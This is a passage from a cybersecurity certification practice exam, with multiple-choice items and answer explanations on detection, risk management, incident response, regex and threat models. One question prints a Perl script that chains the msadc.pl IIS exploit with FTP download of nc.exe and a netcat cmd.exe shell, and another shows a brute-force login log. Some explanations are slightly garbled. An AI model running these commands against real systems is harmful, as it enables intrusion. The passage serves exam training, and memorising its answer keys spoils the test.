This is an example of behavior-based detection. Behavior-based detection (or statistical- or profile-based detection) means that the engine is trained to recognize baseline traffic or expected events associated with a user account or network device. Anything that deviates from this baseline (outside a defined level of tolerance) generates an alert. The heuristic analysis determines whether several observed data points constitute an indicator and whether related indicators make up an incident depend on a good understanding of the relationship between the observed indicators. Human analysts are typically good at interpreting context but work painfully slowly, in computer terms, and cannot hope to cope with the sheer volume of data and traffic generated by a typical network. Anomaly analysis is the process of defining an expected outcome or pattern to events and then identifying any events that do not follow these patterns. This is useful in tools and environments that enable you to set rules. Trend analysis is not used for detection but instead to better understand capacity and the system’s normal baseline. Behavioral-based detection differs from anomaly-based detection. Behavioral-based detection records expected patterns concerning the entity being monitored (in this case, user logins). Anomaly-based detection prescribes the baseline for expected patterns based on its own observation of what normal looks like.

Question 40

Which of the following vulnerabilities was considered the MOST critical because of its potential for a high degree of impact and exploitability?

A. Heartbleed
B. Bluesmack
C. Carbanak
D. ROBOT Attack

Answer 40

A. Heartbleed

The Heartbleed bug is a serious vulnerability in the OpenSSL cryptographic software library. It was first disclosed in April 2014 and allowed anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromised the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. The Heartbleed bug in OpenSSL could have serious consequences, such as private key theft, making it a critical vulnerability. Carbanak is a sophisticated malware that was used in a series of targeted attacks against financial institutions from 2013 to 2015. The malware was able to steal millions of dollars from banks in over 30 countries. While the Carbanak attacks were significant, they involved targeted phishing and advanced persistent threats (APTs), not a widespread vulnerability like Heartbleed. The ROBOT attack is a type of man-in-the-middle attack that can be used to steal sensitive information from a TLS-protected connection. The attack works by exploiting a vulnerability in the RSA encryption algorithm that is used to secure TLS connections. The ROBOT Attack was a significant vulnerability affecting the RSA encryption algorithm, but it didn’t have the same level of impact or exploitability as Heartbleed. Bluesmack is a type of Denial-of-Service (DoS) attack that can be used to disable Bluetooth-enabled devices. The attack works by sending a specially crafted packet to the target device that causes it to crash or become unresponsive. While BlueSmack was a significant vulnerability affecting Bluetooth devices, it did not have the same global impact or exploitability as Heartbleed.

Question 41

Which of the following types of data breaches would require that the US Department of Health and Human Services and the media be notified if more than 500 individuals are affected by a data breach?

A. Trade secret information.
B. Protected health information.
C. Personally identifiable information.
D. Credit card information.

Answer 41

B. Protected health information.

Protected health information (PHI) is defined as any information that identifies someone as the subject of medical and insurance records, plus their associated hospital and laboratory test results. This type of data is protected by the Health Insurance Portability and Accountability Act (HIPPA). It requires notification of the individual, the Secretary of the US Department of Health and Human Services (HHS), and the media (if more than 500 individuals are affected) in the case of a data breach. Personally identifiable information (PII) is any data that can be used to identify, contact, or impersonate an individual. Credit card information is protected under the PCI DSS information security standard. Trade secret information is protected by the organization that owns those secrets.

Question 42

You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement?

A. \b[192.168.66.6]|[10.66.6.10]|[172.16.66.1]\b
B. \b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b
C. \b(192.168.66.6)+(10.66.6.10)+(172.16.66.1)\b
D. \b[192.168.66.6]+[10.66.6.10]+[172.16.66.1]\b

Answer 42

B. \b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b

The correct option is \b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b, which uses parenthesis and “OR” operators (|) to delineate the possible whole-word variations of the three IP addresses. Using square braces indicates that any of the letters contained in the square braces are matching criteria. Using the + operator indicates an allowance for one more instance of the preceding element. In all cases, the period must have an escape () sequence preceding it as the period is a reserved operator internal to REGEX.

Question 43

As an incident response manager, you’ve just concluded an incident where an attacker was able to breach your network by exploiting an unpatched vulnerability. In reviewing the incident, you realize that alerts regarding the vulnerability were overlooked due to a high volume of alerts. What should be your immediate next step to prevent similar occurrences?

A. Perform a root cause analysis.
B. Hire more incident response team members.
C. Ignore the incident since it was resolved.
D. Increase the alert volume to ensure nothing is missed.

Answer 43

A. Perform a root cause analysis.

A root cause analysis can help understand why important alerts were missed and guide improvements in your alert management system to prevent similar oversights in the future. While having more team members may help manage alerts, it does not address the underlying issue of alert fatigue or inadequate alert management. Increasing the alert volume may exacerbate the problem by contributing to alert fatigue, making it more difficult for important alerts to be noticed. Ignoring the issue won’t prevent similar incidents in the future. Learning from incidents is a crucial part of improving security posture.

Question 44

A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the webserver. While the msadc.pl script is effective, and the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a perl script that runs the following msadc commands:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
system(“perl msadc.pl -h $host -C "echo $user»tempfile"”);
system(“perl msadc.pl -h $host -C "echo $pass»tempfile"”);
system(“perl msadc.pl -h $host -C "echo bin»tempfile"”);
system(“perl msadc.pl -h $host -C "echo get nc.exe»tempfile"”);
system(“perl msadc.pl -h $host -C "echo get hacked.html»tempfile"”);
(“perl msadc.pl -h $host -C "echo quit»tempfile"”);
system(“perl msadc.pl -h $host -C "ftp -s:tempfile"”);
$o=; print “Opening FTP connection…\n”;<br></br>system(“perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe"”);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which exploit is indicated by this script:

A. Denial of Service exploit
B. Chained exploit
C. Buffer overflow exploit
D. SQL injection exploit

Answer 44

B. Chained exploit

The script is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and FTP usage. Chained exploits integrate more than one form of attack to accomplish their goal. A buffer overflow is an anomaly where a program that occurs while writing data to a buffer overruns the buffer’s boundary and overwrites adjacent memory locations. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor.

Question 45

Dion Training conducts weekly vulnerability scanning of their network and patches any identified issues within 24 hours. Which of the following best describes the company’s risk response strategy?

A. Transference
B. Avoidance
C. Mitigation
D. Acceptance

Answer 45

C. Mitigation

Risk mitigation is the overall process of reducing exposure to or the effects of risk factors, such as patching a vulnerable system. Transference (or sharing) means assigning risk to a third party (such as an insurance company or a contract with a supplier that defines liabilities). Avoidance means that the company stops doing the activity that is risk-bearing. Acceptance means that no countermeasures are put in place either because the level of risk does not justify the cost or because there will be an unavoidable delay before the countermeasures are deployed.

Question 46

Among the following vulnerabilities, which one was reported as a “Top 10” due to its common occurrence and the potential severity of its impact?

A. Poodle Attack
B. Cross-Site Scripting (XSS)
C. SolarWinds SUNBURST Attack
D. Spectre Attack

Answer 46

B. Cross-Site Scripting (XSS)

XSS vulnerabilities are widespread across web applications and can lead to serious consequences, such as user data theft, making this the correct answer. The Spectre attack was an impactful hardware vulnerability, but it’s not typically categorized as a top 10 vulnerability. While the Poodle Attack was significant and impacted SSL 3.0 protocol, it is not categorized as a top 10 widespread vulnerability. The SolarWinds SUNBURST was a severe, targeted supply chain attack, not a common vulnerability like XSS.

Question 47

When your credit card data is written to the customer invoicing system at Dion Training, the first 12 digits are replaced with an x before storing the data. Which of the following privacy methods is being used?

A. Tokenization
B. Data masking
C. Data minimization
D. Anonymization

Answer 47

B. Data masking

Data masking can mean that all or part of a field’s contents is redacted, by substituting all character strings with x, for example. Tokenization means that all or part of data in a field is replaced with a randomly generated token. The token is stored with the original value on a token server or token vault, separate from the production database. An authorized query or app can retrieve the original value from the vault, if necessary, so tokenization is a reversible technique. Data minimization involves limiting data collection to only what is required to fulfill a specific purpose. Reducing what information is collected reduces the amount and type of information that must be protected. Data anonymization is the process of removing personally identifiable information from a data set so that the people whom the data describe remain anonymous.

Question 48

A critical vulnerability has been identified in Kelly Nexis Analytic’s primary database system, which contains sensitive customer data. It is known that this vulnerability has been exploited in similar systems by attackers. How should the organization’s risk score for this vulnerability be set?

A. Not Applicable
B. High
C. Moderate
D. Low

Answer 48

B. High

Given the critical nature of the vulnerability, the sensitive data involved, and the fact that the vulnerability has been exploited before, a high-risk score would be appropriate. Given the critical nature of the vulnerability and the fact that it has been exploited in similar systems, a low -risk score would be inappropriate. Although this score is higher than low, the critical nature of the vulnerability and the fact that it has been exploited before warrant a higher risk score. Every identified vulnerability should be assigned a risk score to guide its management process.

Question 49

Which type of control aims to minimize the impact of a security incident after it occurs?

A. Corrective control
B. Deterrent control
C. Preventative control
D. Detective control

Answer 49

A. Corrective control

Corrective controls are implemented to mitigate or limit the damage after a security incident has occurred. Detective controls are designed to discover or detect security incidents that have already occurred. Deterrent controls are designed to discourage potential attackers. Preventive controls are designed to prevent security incidents from occurring.

Question 50

In the Mirai botnet attack, thousands of IoT devices, such as cameras and routers, were infected and used to launch large-scale DDoS attacks. In the Diamond Model of Intrusion Analysis, what do these IoT devices represent?

A. Adversary
B. Capability
C. Infrastructure
D. Victim

Answer 50

C. Infrastructure

In the Diamond Model of Intrusion Analysis, the infected IoT devices used in the Mirai botnet attack represent the Infrastructure. The Victim is the target of the attack, not the resources used in the attack. Capability refers to the tools and techniques used in the attack, not the resources used in the attack. The Adversary is the entity conducting the attack, not the resources used in the attack.

Question 51

Which of the following frameworks is commonly used for sharing threat intelligence information in a standardized format?

A. HyperText Markup Language (HTML)
B. Structured Threat Information Expression (STIX)
C. Python
D. Structured Query Language (SQL)

Answer 51

B. Structured Threat Information Expression (STIX)

STIX is a standardized language for representing and sharing threat intelligence. Python is a general-purpose programming language, not a framework for sharing threat intelligence. HTML is a language for creating web pages, not for sharing threat intelligence. SQL is a language for managing and manipulating databases, not for sharing threat intelligence.

Question 52

A recent threat has been announced in the cybersecurity world, stating a critical vulnerability in a particular operating system’s kernel. Unfortunately, your company has not maintained a current asset inventory, so you are unsure of how many of your servers may be affected. What should you do to find all of the affected servers within your network?

A. Conduct a packet capture of data traversing the server network.
B. Conduct a service discovery scan on the network.
C. Conduct an OS fingerprinting scan across the network.
D. Manually review the syslog server’s logs.

Answer 52

C. Conduct an OS fingerprinting scan across the network.

By utilizing operating system fingerprinting using a tool like nmap, you can identify the servers running each version of an operating system. This will give you an accurate list of the possibly affected servers. Once you have this list, you can focus your attention on just those servers that need further inspection and scanning. Manually review the Syslog server’s log would take too long, and would not find servers that don’t send their logs to the Syslog server. Conducting a packet capture would only allow you to find the server actively transmitting data during the period of time you are capturing. Conducting a service discovery scan would not identify which servers are running which operating systems effectively. For example, if you see that the Apache web service is running on port 80, it doesn’t indicate running Linux or Windows as the underlying server.

Question 53

According to the Center for Internet Security’s system design recommendation, which of the following control categories would contain information on the best security practices to implement within the SDLC?

A. Malware defenses.
B. Controlled use of administrative privileges.
C. Application software security.
D. Inventory of authorized/unauthorized devices.

Answer 53

C. Application software security.

Since the software development lifecycle (SDLC) is focused on building software applications, the best control category would be application software security. While all other documents hosted by the Center for Internet Security contain useful information, the application software security control is most likely to contain relevant information relating to best practices to implement in the SDLC.

Question 54

Due to new regulations, your organization’s CIO has the information security team institute a vulnerability management program. What framework would BEST support this program’s establishment?

A. SANS
B. SDLC
C. NIST
D. OWASP

Answer 54

C. NIST

NIST (National Institute of Standards and Technology) produced a useful patch and vulnerability management program framework in its Special Publication (NIST SP 800-40). It would be useful during the program’s establishment and provide a series of guidelines and best practices. SANS is a company specializing in cybersecurity and secure web application development training and sponsors the Global Information Assurance Certification (GIAC). The SDLC is the software development lifecycle. It is a method for dividing programming projects into separate phases. The Open Web Application Security Project (OWASP) is a community effort that provides free access to many secure programming resources. The resources provided include documentation on web app vulnerabilities and mitigation tactics, software tools used to identify and handle threats that target web applications, frameworks for secure development life cycle implementation, frameworks for penetration testing web apps, general secure coding best practices, guidelines for specific web-based languages, and more.

Question 55

What containment technique is the strongest possible response to an incident?

A. Enumeration
B. Isolating affected systems
C. Isolating the attacker
D. Segmentation

Answer 55

B. Isolating affected systems

Isolation involves removing an affected component from whatever larger environment it is a part of. This can be everything from removing a server from the network after it has been the target of a DoS attack, placing an application in a sandbox virtual machine (VM) outside of the host environments it usually runs on. Segmentation-based containment is a means of achieving the isolation of a host or group of hosts using network technologies and architecture. Segmentation uses VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from communicating outside the protected segment. Removal is not an industry term used but would be a synonym for isolation. Enumeration is defined as the process of extracting user names, machine names, network resources, shares, and services from a system. Isolating the attacker would only stop their direct two-way communication and control of the affected system. However, it would not be the strongest possible response since there could be malicious code still running on your victimized machine.

Question 56

[ATTEMPT] target 192.168.1.142 – login “root” – pass “abcde” 1 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “efghi” 2 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “12345” 3 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “67890” 4 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “a1b2c” 5 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “abcde” 6 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “efghi” 7 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “12345” 8 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “67890” 9 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “a1b2c” 10 of 10
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of test is the penetration tester currently conducting?

A. Conducting a port scan of 192.168.1.142.
B. Conducting a Denial of Service attack on 192.168.1.142.
C. Conducting a brute force login attempt of a remote service on 192.168.1.142.
D. Conducting a ping sweep of 192.168.1.142/24.

Answer 56

C. Conducting a brute force login attempt of a remote service on 192.168.1.142.

The penetration tester is attempting to conduct a brute force login attempt of a remote service on 192.168.1.142, as shown by the multiple login attempts with common usernames and passwords. A brute force attack attempts to crack a password or username or find a hidden web page, or find the key used to encrypt a message, using a trial and error approach and hoping, eventually, to guess correctly. Port Scanning is the name for the technique used to identify open ports and services available on a network host. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions. A ping sweep is a basic network scanning technique used to determine which range of IP addresses map to live hosts.

Question 57

Which of the following is NOT considered a phase in the incident response cycle?

A. Notification and communication.
B. Detection and analysis.
C. Preparation.
D. Containment, eradication and recovery.

Answer 57

A. Notification and communication.

There are four phases to the incident response cycle: preparation; detection and analysis; containment, eradication and recovery; and post-incident activity. While you will conduct some notifications and communication during your incident response, that term is not one of the four defined phases.

Question 58

What method might a system administrator use to replicate the DNS information from one DNS server to another, but could also be used maliciously by an attacker?

A. Zone transfers
B. CNAME
C. DNSSEC
D. DNS registration

Answer 58

A. Zone transfers

Zone transfers provide an easy way to send all the DNS information from one DNS server to another, but an attacker could also use it for reconnaissance against your organization. For this reason, most administrators disable zone transfers from untrusted servers. DNSSEC strengthens authentication in DNS using digital signatures based on public-key cryptography. CNAME is a Canonical Name Record or Alias Record. A type of resource record in the Domain Name System (DNS) specifies that one domain name is an alias of another canonical domain name. DNS registration is a service, which allows the owner of a domain name to use their name servers, which can match the domain name in question.

Question 59

Jeff has been contacted by an external security company and told that they had found a copy of his company’s proprietary source code on GitHub. Upon further investigation, Jeff has determined that his organization owns the repository where the source code is located. Which of the following mitigations should Jeff apply immediately?

A. Delete the repository.
B. Change the repository from public to private.
C. Investigate if the source code was downloaded.
D. Revaluate the organization’s information management policies.

Answer 59

B. Change the repository from public to private.

Jeff should immediately change the repository from public to private to prevent further exposure of the source code. Deleting the repository would also fix the issue but could compromise the company’s ongoing business operations. Reevaluation of the company’s information management policies should be done, but this is not as time-critical as changing the repository’s public/private setting. Once the repository is configured to be private, then Jeff should investigate any possible compromises that may have occurred and reevaluate their policies.

Question 60

Consider the following REGEX search string:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).<br></br> (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).
(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).<br></br> (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following strings would NOT be included in the output of this search?

A. 1.2.3.4
B. 37.259.129.207
C. 001.02.3.40
D. 205.255.255.001

Answer 60

B. 37.259.129.207

The \b delimiter indicates that we are looking for whole words for the complete string. The REGEX is made up of four identical repeating strings, (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).”. For now, let us refer to these octets, such as the ones used in internet protocol version 4 addresses. Each octet will allow the combination of 25[0-5] OR (|) 2[0-4][9-] OR numbers 00-99 is preceded by (?) a 0 or 1, or just a single number followed by a “.”. Since the period is treated as a special character in a REGEX operator, the escape character () is required to enable the symbol to act as a dot or period in the output. This sequence repeats four times, allowing for all variations of normal IP addresses to be entered for values 0-255. Since 259 is outside the range of 255, this is rejected. More specifically, character strings starting with 25 must end with a number between 0 and 5 (25[0-5]). Therefore, 259 would be rejected. Now, on exam day, if you received a question like this, you can try to figure out the pattern as explained above, or you can take the logical shortcut. The logical shortcut is to look at the answer first and see that they all look like IP addresses. Remember, grep, and REGEX are used by a cybersecurity analyst to search logs for indicators of compromise (like an IP address), so don’t be afraid to take a logical guess if you need to conserve time during your exam. So, which one isn’t a valid IP address? Clearly, 37.259.129.107 is not a valid IP address, so if you had to guess as to what wouldn’t be an output of this complex-looking command, you should guess that one!

Question 61

In the 2017 Equifax breach, the credit reporting company itself had vast amounts of sensitive personal data of consumers exposed due to a flaw in their Apache Struts web-application software. In the context of the Diamond Model of Intrusion Analysis, who does Equifax represent?

A. Victim
B. Capability
C. Infrastructure
D. Adversary

Answer 61

A. Victim

In the Diamond Model of Intrusion Analysis, Equifax represents the Victim as their systems and data were targeted in the breach. The Adversary is the entity conducting the attack, not the target of the attack. Infrastructure refers to the physical and virtual resources used in the attack, not the targeted entity. Capability refers to the tools and techniques used in the attack, not the targeted entity.

Question 62

You are applying for a job at a cybersecurity firm. The application requests you enter your social security number, date of birth, and email address to conduct a background check as part of the hiring process. Which of the following types of information has you been asked to provide?

A. CUI
B. PHI
C. PII
D. IP

Answer 62

C. PII

Personally identifiable information (PII) is data used to identify, contact, or locate an individual. Information such as social security number (SSN), name, date of birth, email address, telephone number, street address, and biometric data is considered PII. Protected health information (PHI) refers to medical and insurance records, plus associated hospital and laboratory test results. Proprietary information or intellectual property (IP) is information created and owned by the company, typically about the products or services that they make or perform. Controlled Unclassified Information (CUI) is federal non-classified information that must be safeguarded by implementing a uniform set of requirements and information security controls directed at securing sensitive government information.

Question 63

During the Sony Pictures hack in 2014, the attackers installed a wiper malware named Destover on Sony’s systems to erase data. Which phase of the Cyber Kill Chain does this represent?

A. Installation
B. Delivery
C. Reconnaissance
D. Actions and Objectives

Answer 63

A. Installation

The installation of the wiper malware Destover on Sony’s systems represents the Installation phase of the Cyber Kill Chain. Delivery is about transmitting the weaponized payload to the victim, not installing a payload. Actions and Objectives is when the attacker fulfills their intent, not installing a payload. Reconnaissance is about gathering information about the target system, not installing a payload.

Question 64

A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company’s security controls. Which DNS assessment technique would be classified as active?

A. Using maltego
B. A whois query
C. A DNS forward or reverse lookup
D. A zone transfer

Answer 64

D. A zone transfer

DNS zone transfer, also sometimes known by the inducing DNS query type AXFR, is a DNS transaction type. It is one of the many mechanisms available for administrators to replicate DNS databases across a set of DNS servers. DNS zone transfers are an active technique. Performing a whois query is a passive reconnaissance technique that performs a query of the databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information. Performing a DNS forward and reverse lookup zones is an active technique that allows the resolution of names to IP addresses and IP addresses to names. This can be conducted as a passive technique. Maltego is used for open-source intelligence and forensics. It focuses on providing a library for data discovery from open sources and visualizing that information in a graph format suitable for link analysis and data mining. It collects this information passively since it can acquire the information from whois lookup servers, a DNS lookup tool using public DNS servers, or even emails and hostnames one can acquire from TheHarvester.

Question 65

Which of the following is NOT a valid reason to conduct reverse engineering?

A. To determine how a piece of malware operates.
B. To commit industrial espionage.
C. To allow an attacker to spot vulnerabilities in an executable.
D. To allow the software developer to spot flaws in their source code.

Answer 65

D. To allow the software developer to spot flaws in their source code.

If a software developer has a copy of their source code, there is no need to reverse engineer it since they can directly examine the code. Doing this is known as static code analysis, not reverse engineering. Reverse engineering is the process of analyzing a system’s or application’s structure to reveal more about how it functions. In malware, examining the code that implements its functionality can provide you with information as to how the malware propagates and what its primary directives are. Reverse engineering is also used to conduct industrial espionage since it can allow a company to figure out how a competitor’s application works and develop its own version. An attacker might use reverse engineering of an application or executable to identify a flaw or vulnerability in its operation and then exploit that flaw as part of their attack.

Question 66

You’ve been tasked to improve the operational efficiency of your security team. One of the solutions you’ve proposed is to incorporate the use of plugins. How could plugins enhance your team’s operations?

A. By decreasing the number of tools used.
B. By increasing the workload on the team.
C. By replacing current tools.
D. By extending the capabilities of existing tools.

Answer 66

D. By extending the capabilities of existing tools.

Plugins are software components that add specific features to an existing software application, enabling customization and extension of capabilities without heavy coding. Plugins typically increase the functionality of existing tools rather than decreasing the number of tools used. Effective use of plugins should ideally reduce the workload on the team by automating tasks and increasing the efficiency of existing tools, not increase it. Plugins don’t typically replace existing tools, but rather, they add to or improve the functionality of those tools.

Question 67

You just completed an nmap scan against a workstation and received the following output:

-=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=-

Starting Nmap ( http://nmap.org )
Nmap scan report for diontraining012 (192.168.14.61)
Not shown: 997 filtered ports
PORT STATE
135/tcp open
139/tcp open
445/tcp open
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
-=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=-

Based on these results, which of the following operating system is most likely being run by this workstation?

A. Ubuntu
B. Windows
C. macOS
D. CentOS

Answer 67

B. Windows

The workstation is most likely running a version of the Windows operating system. Port 139 and port 445 are associated with the SMB file and printer sharing service run by Windows. Since Windows 2000, the NetBIOS file and print sharing has been running over these ports on all Windows systems by default.

Question 68

The Security Operations Center Director for Dion Training received a pop-up message on his workstation that said, “You will regret firing me; just wait until Christmas!” He suspects the message came from a disgruntled former employee who may have set up a piece of software to create this pop-up on his machine. The director is now concerned that other code might be lurking within the network that could negatively affect Christmas. He directs his team of cybersecurity analysts to begin searching the network for this suspicious code. What type of malware should they be searching for?

A. Adware
B. Worm
C. Trojan
D. Logic bomb

Answer 68

D. Logic bomb

A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. For example, a programmer may hide a piece of code that starts deleting files should they ever be terminated from the company. The director is concerned that a logic bomb may have been created and installed on his system or across the network before the analyst was fired.

Question 69

Which of the following is a best practice that should be followed when scheduling vulnerability scans of an organization’s data center?

A. Schedule scans to begin at the same time every day.
B. Schedule scans to run during periods of low activity.
C. Schedule scans to run during peak times to simulate performance under load.
D. Schedule scans to be conducted evenly throughout the day.

Answer 69

B. Schedule scans to run during periods of low activity.

For the best results, the scans should be scheduled during periods of low activity. This will help to reduce the negative impact of scanning on business operations. The other three options all carry a higher risk of causing disruptions to the network or its business operations.

Question 70

Which of the following tools can NOT be used to conduct a banner grab from a web server on a remote host?

A. telnet
B. ftp
C. netcat
D. wget

Answer 70

B. ftp

FTP cannot be used to conduct a banner grab. A cybersecurity analyst or penetration tester uses a banner grab to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. This is commonly done using telnet, wget, or netcat.

Question 71

Which of the following policies should contain the requirements for removing a user’s access when an employee is terminated?

A. Data ownership policy.
B. Account management policy.
C. Data classification policy.
D. Data retention policy.

Answer 71

B. Account management policy.

Account management policies describe the account life cycle from creation through decommissioning. Data ownership policies describe how ownership information is created and used. Data classification policies describe the classification structure of the data in use by an organization. Retention policies describe what data will be maintained and for how long it will be retained.

Question 72

Which of the following techniques would be the most appropriate solution to implementing a multi-factor authentication system?

A. Username and password.
B. Password and security question.
C. Fingerprint and retinal scan.
D. Smartcard and PIN.

Answer 72

D. Smartcard and PIN.

Multi-factor authentication (MFA) creates multiple security layers to help increase the confidence that the user requesting access is who they claim to be by requiring two distinct factors for authentication. These factors can be something you know (knowledge factor), something you have (possession factor), something you are (inheritance factor), something you do (action factor), or somewhere you are (location factor). By selecting a smartcard (something you have) and a PIN (something you know), you have implemented multi-factor authentication. Choosing a fingerprint and retinal scan would instead use only one factor (inheritance). Choosing a username, password, and security question would also be only using one factor (knowledge). For something to be considered multi-factor, you need items from at least two different authentication factor categories: knowledge, possession, inheritance, location, or action.

Question 73

Among the following strategies for dealing with multiple known vulnerabilities, which one is deemed MOST crucial for their successful management and mitigation?

A. The type of vulnerabilities.
B. The location of vulnerabilities.
C. The number of vulnerabilities.
D. Prioritizing the risk level associated with each vulnerability.

Answer 73

D. Prioritizing the risk level associated with each vulnerability.

Risk prioritization is an essential part of vulnerability management, focusing on the most significant threats in a cybersecurity landscape. It involves assessing potential vulnerabilities, considering their likelihood of exploitation, and the potential impact of such an event. After prioritizing vulnerabilities, the highest-risk ones are addressed first, using methods such as software patching or security policy enhancement. This process is continuously revisited and adjusted as new threats and vulnerabilities emerge. While knowing where vulnerabilities reside is important, it’s not the main factor in prioritization. The risk each vulnerability carries is more critical. The type of vulnerabilities may provide some context, but it is the risk associated with each that should primarily drive prioritization. The number alone does not give an accurate picture of prioritization. Not all vulnerabilities pose the same level of risk.

Question 74

An organization is conducting a cybersecurity training exercise. What team is Jason assigned to if he has been asked to monitor and manage the defenders’ and attackers’ technical environment during the exercise?

A. Purple team
B. Red team
C. Blue team
D. White team

Answer 74

D. White team

Jason is assigned to the white team. The white team acts as the judges, enforces the rules of the exercise, observes the exercise, scores teams, resolves any problems that may arise, handles all requests for information or questions, and ensures that the competition runs fairly and does not cause operational problems for the defender’s mission. A red team is a group of people authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s security posture. A blue team is a group of people responsible for defending an enterprise’s use of information systems by maintaining its security posture against a group of mock attackers. The purple team is made up of both the blue and red teams to work together to maximize their cyber capabilities through continuous feedback and knowledge transfer between attackers and defenders.

Question 75

You are reverse engineering a piece of malware recovered from a retailer’s network for analysis. They found that the malicious code was extracting track data from their customer’s credit cards during processing. Which of the following types of threats would you classify this malware as?

A. POS malware
B. Keylogger
C. Ransomware
D. Rootkit

Answer 75

A. POS malware

Point-of-sale malware (POS malware) is usually a type of malicious software (malware) that is used by cybercriminals to target point of sale (POS) and payment terminals with the intent to obtain credit card and debit card information, a card’s track 1 or track 2 data and even the CVV code, by various man-in-the-middle attacks, that is the interception of the processing at the retail checkout point of sale system. Ransomware is a type of malware that threatens to publish the victim’s data or perpetually block access to it unless a ransom is paid. Keyloggers are a type of monitoring software designed to record keystrokes made by a user. These keyloggers can record the information you type into a website or application and send to back to an attacker. A rootkit is a malware class that modifies system files, often at the kernel level, to conceal its presence.

Question 76

You are in the recovery steps of an incident response. Your analysis revealed that the attacker exploited an unpatched vulnerability on a public-facing web server as the initial intrusion vector in this incident. Which of the following mitigations should be implemented first during the recovery?

A. Restrict host access to peripheral protocols like USB and Bluetooth.
B. Restrict shell commands per user or per host for least privilege purposes.
C. Disable unused user account and reset the administrator credentials.
D. Scan the network for additional instances of this vulnerability and patch the affected assets.

Answer 76

D. Scan the network for additional instances of this vulnerability and patch the affected assets.

All of the options listed are the best security practices to implement before and after a detected intrusion, but scanning for additional instances of this vulnerability should be performed first. Often, an enterprise network uses the same baseline configuration for all servers and workstations. Therefore, if a vulnerability is exploited on one device (such as an insecure configuration), that same vulnerability could exist on many other assets across the network. During your recovery, you must identify if any other network systems share the same vulnerability and mitigate them. If you don’t, the attacker could quickly reinfect your network by simply attacking another machine using the same techniques used during this intrusion. The other options listed are all examples of additional device hardening that should be conducted during recovery after you have identified the exploited vulnerability across the rest of the network.

Question 77

You are in the recovery steps of an incident response. Throughout the incident, your team never successfully determined the root cause of the network compromise. Which of the following options would you LEAST likely perform as part of your recovery and remediation actions?

A. Proactively sanitize and reimage all of your routers and switches.
B. Review and enhance patch management policies.
C. Restrict host access to peripheral protocols like USB or Bluetooth.
D. Disable unused user accounts.

Answer 77

A. Proactively sanitize and reimage all of your routers and switches.

Since your team could not determine the root cause of the compromise, you would most likely conduct system and network hardening actions as part of the recovery and remediation. The only option that is not considered a hardening action is proactively sanitizing and reimaging your routers and switches. If you performed this action, you could have unwanted disruptive effects on the company. Instead, it would be more beneficial to increase monitoring of the devices to ensure they are not compromised. Proactively sanitizing and reimaging all of the routers and switches would be a large undertaking. Without evidence suggesting that such an approach is warranted, you would be wasting a lot of time and money. The other options presented are the best security practices to prevent future compromises. Reimaging the network devices without knowing the root cause will likely be ineffective in securing the network.

Question 78

Your organization has noticed an increase in the number of security incidents being detected. To better understand the situation and measure the effectiveness of your incident response process, what key performance indicator (KPI) could you use?

A. Alert volume.
B. Cost of incidents.
C. Number of false positives.
D. Mean time to remediate.

Answer 78

A. Alert volume.

An increase in alert volume may correlate with an increase in detected incidents. By measuring this KPI, you can gain insights into the frequency of potential security incidents. While reducing false positives is important, this KPI does not directly provide information on the number of true security incidents being detected. This KPI measures how long it takes to address a security incident, not the number of incidents being detected. This KPI measures the financial impact of incidents, not their frequency or detection rate.

Question 79

In 2013, retail giant Target Corporation experienced a massive data breach, exposing the credit and debit card information of 40 million customers. Following this security incident, a special team was tasked with investigating the fundamental cause of the breach, uncovering the sequence of events that led to it, and providing insights to prevent such occurrences in the future. What term best describes this deep-dive investigative process?

A. Lessons learned
B. Root cause analysis
C. Incident response plan
D. Forensic analysis

Answer 79

B. Root cause analysis

